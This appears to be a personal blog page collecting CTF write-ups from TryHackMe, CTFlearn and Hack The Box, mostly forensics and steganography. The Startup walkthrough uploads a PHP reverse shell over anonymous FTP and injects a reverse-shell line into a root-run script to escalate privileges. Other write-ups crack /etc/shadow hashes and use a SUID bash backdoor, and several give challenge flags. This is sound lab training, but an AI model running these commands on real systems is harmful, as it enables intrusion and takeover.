Forensics – ethan

TryHackMe solution: Overpass 2 – Hacked

Link: https://tryhackme.com/room/overpass2hacked

Task 1: Forensics – Analyse the PCAP

#1 “What was the URL of the page they used to upload a reverse shell?“

Download the pcapng file, open it with Wireshark, follow TCP Stream. The answer is in Stream 0.

#2 “What payload did the attacker use to gain access?“

The answer is in Stream 1.

#3 “What password did the attacker use to privesc?“
#4 “How did the attacker establish persistence?“

The answer is in Stream 3.

#5 “Using the fasttrack wordlist, how many of the system passwords were crackable?“

Save the data of /etc/shadow in Stream 3 to a file named “shadow“.

Download the fasttrack wordlist.

Next, we use JohntheRipper to crack the password.

This link tells us how to install and use JohntheRipper.

john-the-ripper shadow -w=fasttrack.txt

Task 2: Research – Analyse the code

#1 “What’s the default hash for the backdoor?“
#2 “What’s the hardcoded salt for the backdoor?“

Access the github link in Stream 3 and read main.go to get the answers.

#3 “What was the hash that the attacker used? – go back to the PCAP for this!“

The answer is in Stream 3.

#4 “Crack the hash using rockyou and a cracking tool of your choice. What’s the password?“

Copy the hash and the salt to a file with the format is:

password$salt

And use JohntheRipper and rockyou.txt to crack the hash.

john-the-ripper hash --format='dynamic=sha512($p.$s)' -w=rockyou.txt

Task 3: Attack – Get back in!

#1 “The attacker defaced the website. What message did they leave as a heading?“

Access the webpage: http://10.10.175.129/

#2 “What’s the user flag?“

In Stream 3, we found that we can connect to ssh through port 2222.

ssh james@10.10.140.222 -p 2222

Use the password we just found in task 2.

#3 “What’s the root flag?“

The hint is: “Did the attacker leave a quick way for them to get root again without a password?“

This is talked about a file named “.suid_bash” in /home/james and we can get root with:

./.suid_bash -p

We can get the explanation here.

CTFlearn solution: Blank Page

Open file with xxd we have:

xxd TheMessage.txt

We see a lot spaces and dots. Then, I think about changing the string into binary with a little code.

inp = open("TheMessage.txt", "r")
l = list(inp.read())
string = ""
for i in range(0, len(l)):
    if l[i] == " ":
        l[i] = '0'
    else:
        l[i] = '1'
    if i % 8 == 0:
        string += ' '
    string += l[i]

outp = open("output.txt", "w")
outp.write(string)

Run that file and we have a binary string, decode it and we found the flag.

From The Global Anti-Terrorists Tactics

If you read this you passed. Congrats.
Your first task will come tomorrow.
Good luck.

CTFlearn{If_y0u_r3/\d_thi5_you_pa553d}

Flag: CTFlearn{If_y0u_r3/\d_thi5_you_pa553d}

TryHackMe solution: Startup

Link: https://tryhackme.com/room/startup

Enumeration

#1 “What is the secret spicy soup recipe?“

First, we use:

nmap -sC -sV 10.10.195.79

to find open ports in the machine.

Port 21 is open so we connect to the server through ftp.

ftp 10.10.195.79

Let’s try anonymous login with:

Name:     anonymous
Password: anonymous

There is a folder named ftp and we can upload a php-reverse-shell.php to the server (after changing the IP).

Using dirsearch and we found a folder named files.

And we found the location of our shell.

Stand up a netcat listener on port 1234.

nc -lvnp 1234

Then, we access the link: http://10.10.195.79/files/ftp/shell.php

to trigger a reverse shell.

Then we found a file named “recipe.txt” and it contains the first flag.

Foothold

#2 “What are the contents of user.txt?“

There is a folder /home/lennie but we cannot access it.

We found “suspicious.pcapng” file in /incidents.

We can host a http server with python here.

python3 -m http.server

Then, we access the link: http://10.10.195.79:8000/

and download this file.

Open it with Wireshark, follow TCP Stream and we found a password.

Use:

python3 -c 'import pty; pty.spawn("/bin/sh")'

to spawning a TTY Shell.

Then use:

su lennie

with the password and we changed to lennie.

We can found the second flag.

Privilege Escalation

#3 “What are the contents of root.txt?“

There is a folder named scripts.

Read file “planner.sh“, we can see that lennie will execute file /etc/print.sh.

Go to /etc and check for the files permission of print.sh, lennie is the owner.

Then, we will inject a code to this file.

/bin/sh/
sh -i >& /dev/udp/10.6.63.158/4242 0>&1

Stand up a netcat listener on port 4242.

nc -lvup 4242

Then run file print.sh.

./print.sh

And we found root flag.

CTFlearn solution: abandoned place

We have a hint:

another hint: dimensions, dimensions, everything is in dimensions.

Then, we think about changing the width and height of the image.

This question from Quora helps a lot.

Open the image with a hex editor and change a little.

Then we have a new image with the flag in it.

Flag: urban_exploration

Hack The Box solution: USB Ripper

We have a syslog file and a file named “auth.json“.

There are many strings in “auth.json” and syslog, so I think about comparing these two files, which is in one file but not in another one.

I use code in Python:

import re

authJson = re.findall("[A-F0-9]+", open("auth.json").read())

syslog = open("syslog")
strList = re.findall("SerialNumber: [A-F0-9]+\n", syslog.read())

authList = []
for string in strList:
  authList.append(re.findall("[A-F0-9]+", string)[0])

for auth in authList:
  if auth not in authJson:
    print(auth)

And we found: 71DF5A33EFFDEA5B1882C9FBDC1240C6

The hint is “Note: once you find it, "crack" it.“.

So, I use CrackStation to crack the string.

Flag: HTB{mychemicalromance}

CTFlearn solution: Naughty Cat

Firstly, we use binwalk to see what is inside the image.

Then, extract all those files with:

binwalk --extract --dd=".*" cut3_c4t.png

We found a .mp3 file and a .rar file.

Open the .mp3 file with Spectrum Analyzer to view the file in spectrogram.

We found a string:

sp3ctrum_1s_y0ur_fr13nd

Open the .rar file and we found nothing, so open it with a Hex Editor.

We can see that the file signature is not rar so we have to fix it.

Then, we can open the file and found a .txt file.

To open it, we need a password, let’s take the string from the .mp3 file.

We found a string: ZjByM241MWNzX21hNXQzcg==

Decode that base64 string to get the flag.

Flag: f0r3n51cs_ma5t3r

CTFlearn solution: Smiling ASCII

I just need to use Steganography Toolkit for this challenge.

Flag: CTFlearn{ascii_pixel_flag}

Hack The Box solution: Took the Byte

In this challenge, we think about a byte shift.

I used CyberChef to solve this challenge.

Flag: HTB{27AjFDkqi1wJ}

Hack The Box solution: Illumination

In this challenge, we have a folder with ‘.git‘ folder inside.

I use GitTools to extract commits and their content from a broken repository. Then, we have 16 commits:

There is ‘config.json‘ file inside these folders.

And we can find the token here. Decode it, we found the flag.

Flag: HTB{v3rsi0n_c0ntr0l_am_I_right?}

CTFlearn solution: Seeing is believing

In this challenge, we have a file name ‘help.me’ and we cannot open it, so I use file command.

file help.me

This is a .ogg file, then we rename it to help.ogg and open it with Spectrum Analyzer to view the file in spectrogram.

We can see a QR code here, scan it and we have a link: https://pastebin.com/zhEhyp3G

Flag: the_flag_is{A_sP3c7r0grAm?!}